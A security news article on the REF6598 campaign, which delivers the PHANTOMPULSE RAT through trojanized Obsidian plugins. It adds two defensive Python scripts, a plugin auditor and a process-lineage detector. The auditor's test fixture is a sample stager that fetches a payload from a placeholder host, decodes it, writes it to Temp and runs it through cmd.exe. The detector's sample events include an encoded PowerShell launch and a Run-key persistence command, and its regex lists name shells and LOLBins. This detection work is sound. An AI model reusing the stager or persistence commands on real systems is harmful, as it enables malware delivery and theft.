# Obsidian Plugin Abuse Delivers PHANTOMPULSE RAT in Targeted Attacks Against Finance and Crypto Sectors


Elastic Security Labs has uncovered a sophisticated social engineering campaign, tracked as REF6598, that weaponizes Obsidian—a popular cross-platform note-taking application—to distribute a previously undocumented remote access trojan dubbed PHANTOMPULSE. The attacks specifically target professionals in financial services and cryptocurrency industries, leveraging carefully crafted malicious plugins to establish persistent system access.


The discovery highlights an emerging threat vector: threat actors are exploiting legitimate productivity tools and their plugin ecosystems to bypass traditional security controls, using social engineering to convince users to install trojanized extensions that appear authentic.


## The Campaign and Attack Flow


REF6598 represents a methodical, well-researched operation that demonstrates deep knowledge of its target audience. Rather than relying on mass-distribution techniques, the attackers employ a highly targeted approach, manually identifying and contacting specific individuals working in fintech, trading, and blockchain development roles.


The social engineering premise centers on fake collaboration scenarios. Researchers observed attackers posing as:

  • Potential business partners in the crypto space
  • Recruiters for prestigious financial firms
  • Developers interested in code contributions
  • Industry peers sharing "research notes" or "trading analysis"

Initial contact occurs via professional networks such as LinkedIn, email, or industry Slack communities. Targets are invited to download a "shared Obsidian vault" or install a "custom plugin" that is claimed to facilitate collaboration, provide market analysis, or integrate with trading platforms.


## The PHANTOMPULSE Remote Access Trojan


PHANTOMPULSE is a fully featured Windows remote access trojan that had not been documented before this campaign. Its capabilities match those of commercial-grade RATs:


| Capability | Purpose |
|------------|---------|
| Command execution | Run arbitrary commands with the logged-in user's privileges |
| File exfiltration | Steal documents, spreadsheets, configuration files |
| Credential harvesting | Extract stored passwords, API keys, cryptocurrency wallets |
| Browser manipulation | Inject malicious content, steal session tokens |
| Screen recording | Monitor user activity and capture sensitive transactions |
| Keylogging | Record keystrokes, including trading orders and passwords |
| Persistence mechanisms | Maintain access across reboots and system updates |
| Anti-analysis evasion | Detect and disable antivirus, sandboxes, and debuggers |


The trojan talks to its command-and-control (C2) infrastructure over HTTPS with an additional layer of obfuscation on the payload, so the traffic blends in with ordinary encrypted web traffic and is hard to single out with network monitoring alone.


## Technical Delivery Mechanism


The attack chain leverages Obsidian's plugin architecture, which extends the application through community-developed extensions. A plugin is a folder under the vault's .obsidian/plugins/ directory holding a manifest.json and a main.js; the JavaScript in main.js runs inside Obsidian's Electron process with full Node.js access, so it can read files, make network requests, and spawn other programs.


Attack sequence:


1. Malicious Plugin Package – Attackers create a plugin disguised as a legitimate utility (e.g., "Crypto Portfolio Tracker," "Trading Journal Helper," "Secure Vault Sync")


2. Sideloaded Installation – Instead of being published through Obsidian's community plugin directory, the plugin is delivered inside the .obsidian/plugins/ directory of a shared vault or via manual installation instructions. Obsidian opens an unfamiliar vault in Restricted mode and asks whether to trust the vault's author and enable its plugins, so the lure has to walk the target through accepting that prompt


3. Obfuscated Payload – The plugin's JavaScript contains obfuscated code that downloads and executes PHANTOMPULSE from the plugin's load routine, which Obsidian runs at startup once the plugin is enabled


4. Privilege Escalation – Once running, PHANTOMPULSE attempts to escalate privileges and establish persistence


5. Callback – The trojan establishes contact with C2 servers and awaits further instructions


The delivery method is particularly effective because:

  • Obsidian is trusted by professionals in finance and crypto; its privacy credentials and offline-first design make it an attractive vehicle
  • Plugin files are plain JavaScript and JSON rather than executables, and Obsidian neither signs nor verifies them, so Windows Defender and similar tools have little to inspect at install time, and the code then runs inside Obsidian's own trusted process
  • No marketplace review – plugins sideloaded outside the official community plugin directory bypass the review that listed plugins receive

## Targeting and Reconnaissance


Elastic's analysis indicates the attackers conducted extensive reconnaissance before engagement. Victims were selected based on:

  • Public GitHub profiles showing crypto or fintech development
  • LinkedIn job titles and employment history
  • Published research papers or technical blog posts
  • Social media activity mentioning cryptocurrency holdings or trading

This targeted approach suggests the threat actor is a motivated, well-resourced group with specific financial objectives, most likely seeking to steal cryptocurrency directly, obtain sensitive trading information, or use the victim as a foothold into larger organizations.


## Implications for Financial and Crypto Organizations


Immediate risks:


  • Direct financial loss – Attackers can execute unauthorized transactions, drain cryptocurrency wallets, or steal API keys linked to trading accounts
  • Operational disruption – Infected systems could be used to launch further attacks internally or manipulate trading algorithms
  • Intellectual property theft – Source code for trading strategies, blockchain protocols, or financial software could be exfiltrated
  • Regulatory exposure – Compromised firms may face SEC or CFTC enforcement if market manipulation occurs through their systems


Secondary concerns:


  • Affected individuals could be pivots into larger organizations, especially if they work for multiple firms or maintain contractor relationships
  • Stolen cryptocurrency exchange credentials could enable unauthorized account access for months before detection
  • Compromised private keys stored in configuration files could lead to permanent asset loss

## Industry Response and Detection


Elastic Security Labs published indicators of compromise (IOCs) including:

  • PHANTOMPULSE file hashes
  • C2 domain names and IP addresses
  • Registry persistence keys
  • Obfuscated JavaScript patterns found in malicious plugins

Security vendors have begun shipping detections. Behavioral detection remains harder because PHANTOMPULSE relies on legitimate Windows APIs and encrypts its C2 traffic. Hashes and domains are also cheap for the operators to rotate, so the plugin-level JavaScript patterns and the process behavior around Obsidian are the more durable signals to build on.


## Recommendations for Organizations and Individuals


Immediate actions:


1. Audit Obsidian installations – Community plugins are stored per vault, not in a central user directory: for every vault the user has opened, inspect the vault's .obsidian/plugins/ folder and compare it with the enabled list in the vault's .obsidian/community-plugins.json. The vaults Obsidian knows about are recorded in its obsidian.json, found under %APPDATA%\obsidian\ on Windows, ~/Library/Application Support/obsidian/ on macOS, and ~/.config/obsidian/ on Linux

2. Verify plugin sources – Only install plugins from Obsidian's official community plugin directory, keep Restricted mode on for vaults you did not create yourself, and be wary of "shared vault" setups from unfamiliar contacts

3. Check for PHANTOMPULSE artifacts – Scan systems with updated antivirus signatures and behavioral detection tools, and match the published IOCs against endpoint and DNS telemetry

4. Review API and exchange accounts – Rotate passwords and API keys, enable 2FA, and audit activity logs on cryptocurrency exchanges and trading platforms
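The audit in step 1 and the "obfuscated JavaScript patterns" listed among the IOCs can be folded into one triage script. The following is an added example written for this article, not Elastic's or Obsidian's code: it walks each vault's .obsidian/plugins/ folder, cross-checks the enabled list in community-plugins.json, and scores every main.js against weighted heuristics for traits a note-taking plugin should not need (a shell, dynamic eval, base64 blobs, dropping files). The heuristic weights, the threshold, the fixture vault it builds when no real vault is found, and the layout of obsidian.json are assumptions, not facts from the report.

```python
"""Inventory Obsidian community plugins per vault and score each main.js heuristically.

Added example for this article, not Elastic's or Obsidian's code. It relies on Obsidian's
plugin layout (per vault: .obsidian/plugins/<id>/{manifest.json,main.js}, enabled ids in
.obsidian/community-plugins.json) and reads vault paths from Obsidian's obsidian.json
(that file's layout is assumed). Weights, threshold and the sample vault are constructed.
"""
import json, os, re, sys, tempfile
from pathlib import Path

# Plugins are CommonJS bundles loaded into Electron with Node access; a note-taking
# plugin rarely needs a shell, dynamic eval, or a dropped file.
HEURISTICS = {
    "child_process": (3, re.compile(r"child_process")),
    "shell_interpreter": (3, re.compile(r"powershell|cmd\.exe|/bin/sh|mshta|rundll32", re.I)),
    "dynamic_eval": (2, re.compile(r"\beval\s*\(|new\s+Function\s*\(")),
    "base64_decode": (2, re.compile(r"""\batob\s*\(|Buffer\.from\([^)]*['"]base64['"]""")),
    "long_encoded_blob": (2, re.compile(r"[A-Za-z0-9+/=]{200,}")),
    "hex_escaped_string": (2, re.compile(r"(?:\\x[0-9a-fA-F]{2}){8,}")),
    "file_drop": (1, re.compile(r"writeFile(?:Sync)?\s*\(")),
    "remote_fetch": (1, re.compile(r"https?://|\brequestUrl\s*\(|\bfetch\s*\(")),
}
FLAG_THRESHOLD = 5  # constructed cut-off; tune against your own plugin inventory

def score_plugin_source(src: str) -> tuple[int, list[str]]:
    """Return (weighted score, matched heuristic names) for one main.js body."""
    hits = [name for name, (_, rx) in HEURISTICS.items() if rx.search(src)]
    return sum(HEURISTICS[h][0] for h in hits), hits

def registered_vaults() -> list[Path]:
    """Vault paths from obsidian.json; Obsidian keeps it in a per-OS config directory."""
    if sys.platform == "win32":
        reg = Path(os.environ.get("APPDATA", Path.home() / "AppData/Roaming")) / "obsidian/obsidian.json"
    elif sys.platform == "darwin":
        reg = Path.home() / "Library/Application Support/obsidian/obsidian.json"
    else:
        reg = Path.home() / ".config/obsidian/obsidian.json"
    if not reg.is_file():
        return []
    return [Path(v["path"]) for v in json.loads(reg.read_text("utf-8")).get("vaults", {}).values() if "path" in v]

def audit_vault(vault: Path) -> list[dict]:
    """List every plugin under <vault>/.obsidian/plugins and cross-check the enabled set."""
    cfg = vault / ".obsidian"
    enabled_file, plugins_dir = cfg / "community-plugins.json", cfg / "plugins"
    enabled = set(json.loads(enabled_file.read_text("utf-8"))) if enabled_file.is_file() else set()
    installed = {p.name: p for p in plugins_dir.iterdir() if p.is_dir()} if plugins_dir.is_dir() else {}
    findings = []
    for pid, pdir in sorted(installed.items()):
        try:
            manifest = json.loads((pdir / "manifest.json").read_text("utf-8"))
        except (OSError, ValueError):
            manifest = {}
        main_js = pdir / "main.js"
        score, issues = score_plugin_source(main_js.read_text("utf-8", errors="replace") if main_js.is_file() else "")
        if manifest.get("id") != pid:
            issues.append("manifest_id_mismatch")  # folder name and declared id disagree
        findings.append({"vault": str(vault), "plugin": pid, "enabled": pid in enabled,
                         "score": score, "flagged": score >= FLAG_THRESHOLD, "issues": issues})
    for pid in sorted(enabled - set(installed)):  # enabled but folder gone: cleanup trace
        findings.append({"vault": str(vault), "plugin": pid, "enabled": True, "score": 0,
                         "flagged": False, "issues": ["enabled_not_installed"]})
    return findings

# Constructed fixtures: a benign plugin and an inert stager with the traits the article
# describes (fetch, base64-decode, drop and launch a second stage from onload()).
BENIGN_MAIN_JS = """const { Plugin } = require("obsidian");
module.exports = class WordCount extends Plugin {
  async onload() { this.addStatusBarItem().setText("words: 0"); }
};"""
SUSPICIOUS_MAIN_JS = """const { Plugin, requestUrl } = require("obsidian");
const cp = require("child_process"), fs = require("fs");
module.exports = class Tracker extends Plugin {
  async onload() {
    const r = await requestUrl({ url: "https://example.invalid/update" });
    fs.writeFileSync(process.env.TEMP + "\\\\svc.exe", Buffer.from(r.text, "base64"));
    cp.exec("cmd.exe /c " + process.env.TEMP + "\\\\svc.exe");
  }
};"""

def build_sample_vault(root: Path) -> Path:
    """Write a throwaway vault with both fixtures installed and enabled."""
    cfg = root / "vault" / ".obsidian"
    for pid, src in (("word-count", BENIGN_MAIN_JS), ("crypto-portfolio-tracker", SUSPICIOUS_MAIN_JS)):
        (cfg / "plugins" / pid).mkdir(parents=True)
        (cfg / "plugins" / pid / "manifest.json").write_text(json.dumps({"id": pid, "name": pid, "version": "1.0.0"}))
        (cfg / "plugins" / pid / "main.js").write_text(src)
    (cfg / "community-plugins.json").write_text(json.dumps(["word-count", "crypto-portfolio-tracker"]))
    return root / "vault"

def demo_findings() -> dict[str, dict]:
    """Audit the constructed vault and return findings keyed by plugin id."""
    with tempfile.TemporaryDirectory() as tmp:
        return {f["plugin"]: f for f in audit_vault(build_sample_vault(Path(tmp)))}

if __name__ == "__main__":  # audit vaults given on the command line, else the registered ones
    targets = [Path(a) for a in sys.argv[1:]] or registered_vaults()
    results = [f for v in targets for f in audit_vault(v)] if targets else list(demo_findings().values())
    for f in results:
        print("FLAG" if f["flagged"] else "ok  ", f"{f['plugin']:<28} score={f['score']:<3}", ",".join(f["issues"]))
```

Run it with one or more vault paths, or with no arguments to audit every vault listed in obsidian.json; on a host with no vaults it audits the constructed fixture instead. The scoring is deliberately coarse: remote_fetch and file_drop on their own are normal for sync and export plugins, which is why they weigh 1, while anything that reaches for child_process or a shell interpreter is weighted so that it crosses the threshold with a single companion hit. Treat a flag as a reason to read the file, not as a verdict, and compare the plugin folder against the same plugin's published release when one exists.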


Long-term hardening:


  • Implement application allowlisting – Restrict which applications can execute on developer and trading workstations
  • Network segmentation – Isolate trading and financial systems from general-purpose development machines
  • Privileged access management (PAM) – Control access to sensitive accounts, API keys, and cryptocurrency wallets using centralized PAM solutions
  • Supply chain security – When adopting community tools, verify provenance and monitor for plugin updates from unexpected sources
  • User security training – Educate technical staff on social engineering tactics and the risks of downloading tools from untrusted sources, especially when pressure or urgency is applied
  • Endpoint detection and response (EDR) – Deploy EDR solutions capable of detecting PHANTOMPULSE's command execution and persistence behaviors
  • Email and communication security – Screen incoming messages for impersonation and credential harvesting attempts
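What the EDR behavior the hardening list asks for can look like in practice, as an added example for this article rather than Elastic's or any vendor's rule: since the plugin runs inside Obsidian's own process, the durable tell is the process tree, not a file hash. The logic below walks process-creation events in time order and alerts when Obsidian spawns a command interpreter or a binary in a user-writable path, then keeps following that lineage so that a dropped second stage setting a Run key is attributed back to Obsidian. The sample events are constructed in the shape of Sysmon Event ID 1 records, and the image lists, path patterns and severity rules are assumptions to tune per environment; in particular, Electron re-spawns Obsidian.exe as helper processes and some legitimate plugins shell out (for example to git), so both cases are included as negative controls.

```python
"""Flag shells, LOLBins and dropped binaries launched by Obsidian, following the lineage.

Added example for this article, not Elastic's or any vendor's detection content. Events are
constructed in the shape of Sysmon Event ID 1 / EDR process-creation records; the image
lists, path patterns and severity rules are assumptions to tune per environment.
"""
import re
from pathlib import PureWindowsPath

OBSIDIAN_IMAGES = {"obsidian.exe"}
INTERPRETERS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe",
                "rundll32.exe", "regsvr32.exe", "certutil.exe", "bitsadmin.exe", "curl.exe",
                "msiexec.exe", "schtasks.exe", "reg.exe"}
USER_WRITABLE = re.compile(r"\\temp\\|\\appdata\\local\\|\\downloads\\|\\public\\", re.I)
ENCODED_PS = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}", re.I)
PERSISTENCE = re.compile(r"schtasks|currentversion\\run|new-itemproperty.*\\run", re.I)
HIGH = {"encoded_powershell", "persistence_attempt", "spawned_from_user_writable_path"}

def basename(path: str) -> str:
    return PureWindowsPath(path).name.lower()

def analyze(events: list[dict]) -> list[dict]:
    """Walk process-creation events in time order and alert on Obsidian-rooted lineage."""
    tainted = set()  # ProcessGuids of non-Obsidian processes descended from Obsidian
    alerts = []
    for ev in events:
        parent, child = basename(ev["ParentImage"]), basename(ev["Image"])
        if parent not in OBSIDIAN_IMAGES and ev["ParentProcessGuid"] not in tainted:
            continue  # unrelated to Obsidian
        if child in OBSIDIAN_IMAGES:
            continue  # Electron helpers (--type=renderer/gpu) re-spawn the same image; normal
        tainted.add(ev["ProcessGuid"])  # every non-Obsidian child is followed, even if quiet itself
        reasons = []
        if child in INTERPRETERS:
            reasons.append(f"interpreter_{child}")
        elif USER_WRITABLE.search(ev["Image"]):
            reasons.append("spawned_from_user_writable_path")
        if ENCODED_PS.search(ev["CommandLine"]):
            reasons.append("encoded_powershell")
        if PERSISTENCE.search(ev["CommandLine"]):
            reasons.append("persistence_attempt")
        if parent not in OBSIDIAN_IMAGES:
            reasons.append(f"descendant_of_obsidian_via_{parent}")
        if reasons:
            alerts.append({"pid": ev["ProcessId"], "image": child, "reasons": reasons,
                           "severity": "high" if HIGH & set(reasons) else "medium"})
    return alerts

# Constructed events: one Obsidian session on a Windows workstation, in time order.
OBS = r"C:\Users\alice\AppData\Local\Obsidian\Obsidian.exe"
TMP_SVC = r"C:\Users\alice\AppData\Local\Temp\svc.exe"
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    {"ProcessGuid": "g1", "ParentProcessGuid": "g0", "ProcessId": 4120, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": OBS, "CommandLine": "Obsidian.exe"},                                   # user launches Obsidian
    {"ProcessGuid": "g2", "ParentProcessGuid": "g1", "ProcessId": 4188, "ParentImage": OBS,
     "Image": OBS, "CommandLine": "Obsidian.exe --type=renderer"},                   # Electron helper, benign
    {"ProcessGuid": "g3", "ParentProcessGuid": "g1", "ProcessId": 4300, "ParentImage": OBS,
     "Image": r"C:\Program Files\Git\cmd\git.exe", "CommandLine": "git status --porcelain"},  # Git plugin, benign
    {"ProcessGuid": "g4", "ParentProcessGuid": "g1", "ProcessId": 4412, "ParentImage": OBS,
     "Image": PS, "CommandLine": "powershell.exe -nop -w hidden -enc QQBBAEEAQQBBAEEAQQBBAEEAQQBBAEEAQQBBAA=="},  # dummy blob
    {"ProcessGuid": "g5", "ParentProcessGuid": "g1", "ProcessId": 4520, "ParentImage": OBS,
     "Image": TMP_SVC, "CommandLine": TMP_SVC},                                       # dropped second stage
    {"ProcessGuid": "g6", "ParentProcessGuid": "g5", "ProcessId": 4601, "ParentImage": TMP_SVC,
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"cmd.exe /c reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Updater /d " + TMP_SVC},
    {"ProcessGuid": "g7", "ParentProcessGuid": "g0", "ProcessId": 4700, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": PS, "CommandLine": "powershell.exe"},                                   # user's own shell, unrelated
]

if __name__ == "__main__":
    for a in analyze(SAMPLE_EVENTS):
        print(f"[{a['severity']:<6}] pid={a['pid']} {a['image']}: {', '.join(a['reasons'])}")
```

Three of the seven events alert: the encoded PowerShell launched from Obsidian, the binary executed from Temp, and the cmd.exe that svc.exe used to write a Run key, which is reported as a descendant of Obsidian rather than as an isolated registry change. The Obsidian-launches-Obsidian event and the git child produce nothing, but the git child is still added to the lineage; that is a deliberate trade-off, since a dropped binary outside the user-writable patterns would otherwise break the chain, and it means hosts using plugins that shell out will see medium alerts on their grandchildren until those parents are allowlisted.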

## Conclusion


The REF6598 campaign demonstrates that legitimate tools remain attractive attack vectors for sophisticated threat actors. By combining social engineering, a trusted application, and a previously unknown malware family, the attackers built a multi-stage intrusion that bypasses many traditional defenses while borrowing the shape of a supply-chain compromise: the victim installs the malware themselves, through a channel they trust.


Organizations in financial services and cryptocurrency must assume they are being actively targeted by skilled adversaries. Defense requires not only technical controls but also heightened awareness of social engineering tactics and rigorous verification of tool sources, even for applications perceived as secure or privacy-friendly.


As Obsidian continues to grow in popularity among technical professionals, security teams should monitor the ecosystem closely and educate users that trust in the application does not extend to unvetted plugins, regardless of how legitimate they appear.


---


*HackWire will continue to monitor this campaign. Further updates will be published as more infrastructure is identified and takedown efforts progress.*